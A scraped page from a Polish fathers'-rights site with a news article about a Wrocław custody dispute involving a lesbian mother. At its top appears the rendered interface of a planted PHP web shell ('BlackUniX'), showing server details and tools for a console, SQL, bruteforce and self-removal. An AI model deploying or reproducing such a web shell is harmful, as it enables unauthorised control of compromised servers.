W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-17 09:20:14
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.17.157
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Babcia chce odebrać wnuczkę córce lesbijce
20.05.2008.
Na początku czerwca wrocławski sąd zdecyduje, czy czteroletnia Marysia będzie mogła mieszkać ze swoją matką lesbijką. Na razie jest u babci, która nie chce jej oddać, bo nie toleruje tego, że jej córka mieszka z partnerką.
Wczoraj zakończył się proces w sprawie ograniczenia praw rodzicielskich Annie K. i wyznaczenia jej matki jako rodziny zastępczej dla Marysi. Jako precedensowy monitoruje go Helsińska Fundacja Praw Człowieka.

23-letnia Anna K. mieszka we Wrocławiu. Marysię urodziła jako 19-latka i wychowywała bez ojca, który nie interesował się dzieckiem. Dwa lata temu została zgwałcona i znów zaszła w ciążę, ale poroniła. Przeszła jednak załamanie nerwowe. Zostawiła więc córkę pod opieką swojej matki w jednym z miast Wielkopolski. Marysię odwiedzała jednak regularnie, a gdy wyzdrowiała, postanowiła zabrać córkę do Wrocławia. Wtedy na wniosek babci Marysi sąd umieścił dziecko w rodzinie zastępczej, czyli właśnie u niej. Swój wniosek matka Anny K. uzasadniała złym towarzystwem, w jakim przebywa jej córka. Twierdziła, że bierze ona narkotyki, a nawet sugerowała, że razem z partnerką wykorzystują dziewczynkę seksualnie.

- Matka mówiła, że jestem szmatą, bo mieszkam z kobietą - opowiada Anna K. Przyznaje, że brała narkotyki, ale jako nastolatka, ale od kilku lat nie bierze, jest nawet honorowym dawcą krwi. Zarzut, że wykorzystywała małą seksualnie, uważa za absurdalny. Biegli potwierdzili, że nic takiego się nie zdarzyło.

Adwokat Mateusz Boznański: - Anna nie zrobiła nic, żeby ograniczać jej władzę rodzicielską. Podczas procesu wszystkie zarzuty zostały obalone.

Reprezentujący jej matkę Piotr Stajniak: - Mojej klientce wcale nie przeszkadza to, że jej córka jest homoseksualna, ale to, że nie będzie w stanie prawidłowo wychowywać Marysi.

Powołani przez sąd biegli: psychiatra, psycholog i pedagog orzekli, że Anna K. jest niedojrzałą emocjonalnie egocentryczką, która manipuluje otoczeniem i traktuje je instrumentalnie. Nie potrafi sobie radzić z trudnymi sytuacjami, ale jest w wieku, kiedy charakter się jeszcze kształtuje. Dlatego uważają, że Marysia powinna przejściowo zostać z babcią. Zalecili też mediacje z udziałem specjalisty, aby dziewczynka mogła łagodnie wrócić do matki. Nie widzą przeciwwskazań, aby dziecko mieszkało z Anną i jej partnerką.

- Nie rozumiem tego, nie zrobiłam nic złego, jestem dobrą matką. Mam świetny kontakt z córką. Dlaczego nie możemy mieszkać razem? - mówił Anna K.

Do zakończenia sprawy Marysia ma mieszkać u babci, matka zabierać ją będzie na weekendy.
Źródło: Gazeta Wyborcza Wrocław Katarzyna Lubiniecka
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


17.07.2018.